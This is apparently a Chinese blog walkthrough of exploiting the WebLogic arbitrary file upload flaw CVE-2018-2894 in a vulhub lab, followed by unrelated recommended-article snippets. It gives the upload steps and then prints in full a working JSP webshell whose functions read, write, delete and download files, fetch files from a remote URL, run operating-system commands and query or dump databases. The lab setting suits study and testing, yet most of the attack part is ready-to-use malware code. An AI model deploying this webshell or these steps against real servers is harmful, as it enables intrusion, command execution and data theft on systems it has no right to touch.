【vulhub】Weblogic任意文件上传漏洞(CVE-2018-2894)_vulhub cve-2018-2894-程序员宅基地

技术标签: WebLogic  安全  

前言

Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。
受影响的版本
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。
利用条件:
1、需要知道部署应用的web目录
2、ws_utc/config.do在开发模式下无需认证,在生产模式下需要认证。

一、启动靶机

docker-compose build
docker-compose up -d

二、漏洞检验

执行如下命令可查看管理员密码,管理员用户名为weblogic,密码为7NAEag6D

docker-compose logs | grep password

在这里插入图片描述
利用上面的账号密码登录weblogic

http://192.168.150.146:7001/console/login/LoginForm.jsp

在这里插入图片描述
登录后台页面,点击base_domain的配置,在 ‘高级’ 中勾选 ‘启用 Web 服务测试页’ 选项,然后保存配置。
在这里插入图片描述
在这里插入图片描述
访问http://192.168.150.146:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css,访问这个目录是无需权限的,这一点很重要。

在这里插入图片描述

然后点击 ‘安全’ -> ‘添加’ ,然后上传jsp大马(本文最后附jsp大马)
在这里插入图片描述
上传的文件名,可审查元素,查看时间戳(也可使用抓包方式进行查看)
上传的文件名=[时间戳]_[上传前的文件名]。
在这里插入图片描述
访问http://192.168.150.146:7001/ws_utc/css/config/keystore/1639050666825_test.jsp,即可执行上传文件。
在这里插入图片描述
test.jsp

<html>
  <head>
      <title>Test</title>
  </head>
  <body>
      <%
         out.println("test");
      %>
  </body>
</html>

三、漏洞利用

jsp大马:

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
    String Pwd = "Cknife";
    String cs = "UTF-8";
    
    String EC(String s) throws Exception {
    
        return new String(s.getBytes("ISO-8859-1"),cs);
    }
    
    Connection GC(String s) throws Exception {
    
        String[] x = s.trim().split("choraheiheihei");
        Class.forName(x[0].trim());
        if(x[1].indexOf("jdbc:oracle")!=-1){
    
            return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
        }else{
    
            Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
            if (x.length > 4) {
    
                c.setCatalog(x[4]);
            }
            return c;
        }
    }
    
    void AA(StringBuffer sb) throws Exception {
    
        File k = new File("");
        File r[] = k.listRoots();
        for (int i = 0; i < r.length; i++) {
    
            sb.append(r[i].toString().substring(0, 2));
        }
    }
    
    void BB(String s, StringBuffer sb) throws Exception {
    
        File oF = new File(s), l[] = oF.listFiles();
        String sT, sQ, sF = "";
        java.util.Date dt;
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
    
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            if (l[i].isDirectory()) {
    
                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");
            } else {
    
                sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";
            }
        }
        sb.append(sF);
    }
    
    void EE(String s) throws Exception {
    
        File f = new File(s);
        if (f.isDirectory()) {
    
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
    
                if (!x[k].delete()) {
    
                    EE(x[k].getPath());
                }
            }
        }
        f.delete();
    }
    
    void FF(String s, HttpServletResponse r) throws Exception {
    
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
        os.write(("->" + "|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
    
            os.write(b, 0, n);
        }
        os.write(("|" + "<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }
    
    void GG(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
        }
        os.close();
    }
    
    void HH(String s, String d) throws Exception {
    
        File sf = new File(s), df = new File(d);
        if (sf.isDirectory()) {
    
            if (!df.exists()) {
    
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
    
                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
            }
        } else {
    
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[512];
            while ((n = is.read(b, 0, 512)) != -1) {
    
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }
    
    void II(String s, String d) throws Exception {
    
        File sf = new File(s), df = new File(d);
        sf.renameTo(df);
    }
    
    void JJ(String s) throws Exception {
    
        File f = new File(s);
        f.mkdir();
    }
    
    void KK(String s, String t) throws Exception {
    
        File f = new File(s);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(t);
        f.setLastModified(dt.getTime());
    }
    
    void LL(String s, String d) throws Exception {
    
        URL u = new URL(s);
        int n = 0;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b)) != -1) {
    
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }
    
    void MM(InputStream is, StringBuffer sb) throws Exception {
    
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        while ((l = br.readLine()) != null) {
    
            sb.append(l + "\r\n");
        }
    }
    
    void NN(String s, StringBuffer sb) throws Exception {
    
        Connection c = GC(s);
        ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();
        while (r.next()) {
    
            sb.append(r.getString(1) + "\t|\t\r\n");
        }
        r.close();
        c.close();
    }
    
    void OO(String s, StringBuffer sb) throws Exception {
    
        Connection c = GC(s);
        String[] x = s.trim().split("choraheiheihei");
        ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{
    "TABLE"});
        while (r.next()) {
    
            sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n");
        }
        r.close();
        c.close();
    }
    
    void PP(String s, StringBuffer sb) throws Exception {
    
        String[] x = s.trim().split("\r\n");
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1007);
        ResultSet r = m.executeQuery("select * from " + x[x.length-1]);
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
    
            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");
        }
        r.close();
        m.close();
        c.close();
    }
    
    void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {
    
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1008);
        BufferedWriter bw = null;
        try {
    
            ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (int i = 1; i <= n; i++) {
    
                sb.append(d.getColumnName(i) + "\t|\t");
            }
            sb.append("\r\n");
            if(q.indexOf("--f:")!=-1){
    
                File file = new File(p);
                if(q.indexOf("-to:")==-1){
    
                    file.mkdir();
                }
                bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));
            }
            while (r.next()) {
    
                for (int i = 1; i <= n; i++) {
    
                    if(q.indexOf("--f:")!=-1){
    
                        bw.write(r.getObject(i)+""+"\t");
                        bw.flush();
                    }else{
    
                        sb.append(r.getObject(i)+"" + "\t|\t");
                    }
                }
                if(bw!=null){
    bw.newLine();}
                sb.append("\r\n");
            }
            r.close();
            if(bw!=null){
    bw.close();}
        } catch (Exception e) {
    
            sb.append("Result\t|\t\r\n");
            try {
    
                m.executeUpdate(q);
                sb.append("Execute Successfully!\t|\t\r\n");
            } catch (Exception ee) {
    
                sb.append(ee.toString() + "\t|\t\r\n");
            }
        }
        m.close();
        c.close();
    }
%>
<%
 
 
//String Z = EC(request.getParameter(Pwd) + "", cs);
    
    cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs;
    request.setCharacterEncoding(cs);
    response.setContentType("text/html;charset=" + cs);
    StringBuffer sb = new StringBuffer("");
if (request.getParameter(Pwd) != null) {
    
 
    try {
    
        String Z = EC(request.getParameter("action") + "");
        String z1 = EC(request.getParameter("z1") + "");
        String z2 = EC(request.getParameter("z2") + "");
        sb.append("->" + "|");
        String s = request.getSession().getServletContext().getRealPath("/");
        if (Z.equals("A")) {
    
            sb.append(s + "\t");
            if (!s.substring(0, 1).equals("/")) {
    
                AA(sb);
            }
        } else if (Z.equals("B")) {
    
            BB(z1, sb);
        } else if (Z.equals("C")) {
    
            String l = "";
            BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
            while ((l = br.readLine()) != null) {
    
                sb.append(l + "\r\n");
            }
            br.close();
        } else if (Z.equals("D")) {
    
            BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
            bw.write(z2);
            bw.close();
            sb.append("1");
        } else if (Z.equals("E")) {
    
            EE(z1);
            sb.append("1");
        } else if (Z.equals("F")) {
    
            FF(z1, response);
        } else if (Z.equals("G")) {
    
            GG(z1, z2);
            sb.append("1");
        } else if (Z.equals("H")) {
    
            HH(z1, z2);
            sb.append("1");
        } else if (Z.equals("I")) {
    
            II(z1, z2);
            sb.append("1");
        } else if (Z.equals("J")) {
    
            JJ(z1);
            sb.append("1");
        } else if (Z.equals("K")) {
    
            KK(z1, z2);
            sb.append("1");
        } else if (Z.equals("L")) {
    
            LL(z1, z2);
            sb.append("1");
        } else if (Z.equals("M")) {
    
            String[] c = {
     z1.substring(2), z1.substring(0, 2), z2 };
            Process p = Runtime.getRuntime().exec(c);
            MM(p.getInputStream(), sb);
            MM(p.getErrorStream(), sb);
        } else if (Z.equals("N")) {
    
            NN(z1, sb);
        } else if (Z.equals("O")) {
    
            OO(z1, sb);
        } else if (Z.equals("P")) {
    
            PP(z1, sb);
        } else if (Z.equals("Q")) {
    
            QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");
        }
    } catch (Exception e) {
    
        sb.append("ERROR" + ":// " + e.toString());
    }
    sb.append("|" + "<-");
    out.print(sb.toString());
}
%>

完全参考文章

https://blog.csdn.net/weixin_43625577/article/details/97001677

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121841855

智能推荐

react学习总结6--构建工具Gulp、Browserify(二)_react gulp-程序员宅基地

文章浏览阅读1k次。react 学习总结–构建工具Gulp、Browserify(二)1.html 文件处理gulp-htmlmin 插件 用于压缩html,可以进行配置,下边是配置信息(选填) var gulp = require('gulp'), htmlmin = require('gulp-htmlmin'); gulp.task('htmlmin', function ()_react gulp

开关电源输入:共模电感,X电容,Y电容,差摸电感理论计算!_共模电感和y电容在滤波方面的区别-程序员宅基地

文章浏览阅读7.6k次,点赞3次,收藏69次。转自:https://mp.weixin.qq.com/s/qp_DSBGKdjNo2-lO2s5v7Q引言在开关电源中,EMI滤波器对共模和差模传导噪声的抑制起着显著的作用。在研究滤波器原理的基础上,探讨了一种对共模、差模信号进行独立分析,分别建模的方法,最后基于此提出了一种EMI滤波器的设计程序。高频开关电源由于其在体积、重量、功率密度、效率等方面的诸多优点,已经被广泛地应用于工业..._共模电感和y电容在滤波方面的区别

IntelliJ IDEA 设置注释模板 (Mac)_mac idea 设置注解格式-程序员宅基地

文章浏览阅读7.9k次。类注释模板设置:点击 preferences ,搜索 File and Code Template ,在 Files tab 页下,选择 Class,在类名上面添加模板:/** * @program ${PROJECT_NAME} * @description: ${TODO} * @author: ${USER} * @create: ${YEAR}/${MONTH}/${DAY}..._mac idea 设置注解格式

sizeof用法 _sizeof(4.0+2)-程序员宅基地

文章浏览阅读2k次。Sizeof用法本文主要包括二个部分,第一部分重点介绍在VC中,怎么样采用sizeof来求结构的大小,以及容易出现的问题,并给出解决问题的方法,第二部分总结出VC中sizeof的主要用法。1、 sizeof应用在结构上的情况请看下面的结构:struct MyStruct{double dda1;char dda;int type};对结构MyStruct采用_sizeof(4.0+2)

阅读小结:Large-Margin Softmax Loss for Convolutional Neural Networks_large-margin softmax loss的代码-程序员宅基地

文章浏览阅读2.2k次,点赞3次,收藏4次。徐博最近一直在看我博客,肯定是想看我什么时候不更新,然后好嘲笑我。当然,不排除徐博已经爱上我的可能。What:改进SoftmaxLoss,显式的控制类内的距离,(不让 已经对的样本score太高,影响训练)可以防止过拟合。回顾SoftmaxLoss:1. Softmax 就是一个把一个向量归一的函数,输出也是向量。在matlab里就3行代码:% X_large-margin softmax loss的代码

后端java解析复杂嵌套json_java 解析复杂类型的json-程序员宅基地

文章浏览阅读6.2k次。其实不是很复杂百度翻译传过来的json数据:{"from":"zh","to":"en","trans_result":[{"src":"高度600米","dst":"Height 600 meters"}]}现在要取出dst对应的值:Height 600 meters String date="{"from":"zh","to":"en","trans_result":[_java 解析复杂类型的json

随便推点

如何高效地从BAM文件中提取fastq-程序员宅基地

文章浏览阅读1.8k次。在一年前,我写过一篇文章,叫做如何从BAM文件中提取fastq,之前也发现了从BAM里面提取Fastq是有些麻烦,只不过最后通过samtools的子命令实现了数据提取,实现功能之后也没有再去思考如何提高效率。最近读到每周文献-190419-植物单细胞BAM重比对以及假基因研究时,发现里面提到了一个工具叫做 bazam, 功能就是提取Fastq文件,文章发表在 Genome Bio..._10x 开发的工具 bamtofastq

中国电信天翼宽带无线路由器设置wifi笔记_中国电信wifi设置时间-程序员宅基地

文章浏览阅读8k次。0x00 前言 还记得电信天翼宽带吗?现在的天翼宽带的终端基本是华为的无限路由了,相信有不少同学在包装了中国电信天翼宽带后,个人申请到一个账号/密码,并且额外缴费得到一个路由器,然后就没有然后了。心里就纳闷,咋上wifi,然后又得另外花钱买个无线路由,然后不知道怎样弄。0x01 电信宽带的路由终端首先电信的华为路由器的底部都会贴有该终端的信息,例如终端登录地址,账号,密码等_中国电信wifi设置时间

让VC编译出来的程序不依赖于msvcr80.dll/msvcr90.dll/msvcr100.dll等文件_编译msvc不依赖msvcr100.dll-程序员宅基地

文章浏览阅读853次。让VC编译出来的程序不依赖于msvcr80.dll/msvcr90.dll/msvcr100.dll等文件正常情况下,当我们用VC编译出一个Console/Win32类型项目的exe程序时(这里暂不考虑MFC程序),会依赖于msvcrxx.dll文件(xx为不同VC对应的版本号,VC2005为80,VC2008为90,VC2010为100),发布程序的时候,就需要把对应的dll也cop_编译msvc不依赖msvcr100.dll

什么是问题?_问题是什么-程序员宅基地

文章浏览阅读4.6k次。今天看到一篇文章,说什么是问题?看到这个标题很好奇。就点进去看了一下。以下是总结和思考。漫漫人生中,我们总会遇到各种各样的问题。那么什么是问题呢?有以下一个定义:问题是目标与现状的差异。解决方案,就是现状到目标的路径。那么,什么是目标呢?目标应该是符合真实的需求。那么,什么是需求呢?需求不仅包含当前这个问题,有时候它更需要考虑到整个系统。打个比方说,有一天某个系统出现了超时问题,..._问题是什么

java中controller,service,serviceImpl,mapper,xml等几个文件的作用理解,以简单的查询为例_serviceimpl类的作用是什么-程序员宅基地

文章浏览阅读5.3w次,点赞59次,收藏278次。说明:最近一周都在写报表,样式很统一,上面是查询条件,下面是查询结果,页面如下图所示。由于要写很多报表,都是重复的工作,所以部门里的小哥哥在写了一个基于node的小程序,直接配置JSON文件,就可以生成报表模板,感觉很强(后面想学习一下)。作为一个优秀的CV工程师(复制粘贴),我也没怎么写前端的工作,直接用生成的模板就好了,但是后台的查询我还是稍微走心的。由于JAVA基础不是很好,总结的可..._serviceimpl类的作用是什么

java开发注释规范,开发人员代码注释规范.doc-程序员宅基地

文章浏览阅读111次。开发人员代码注释规范开发人员代码注释规范Java类版权及代码注释注释示例package java.blah;import java.blah.blahdy.BlahBlah;/** ==========================================================* Version Author Date Des..._huangzhihui java

推荐文章

热门文章

相关标签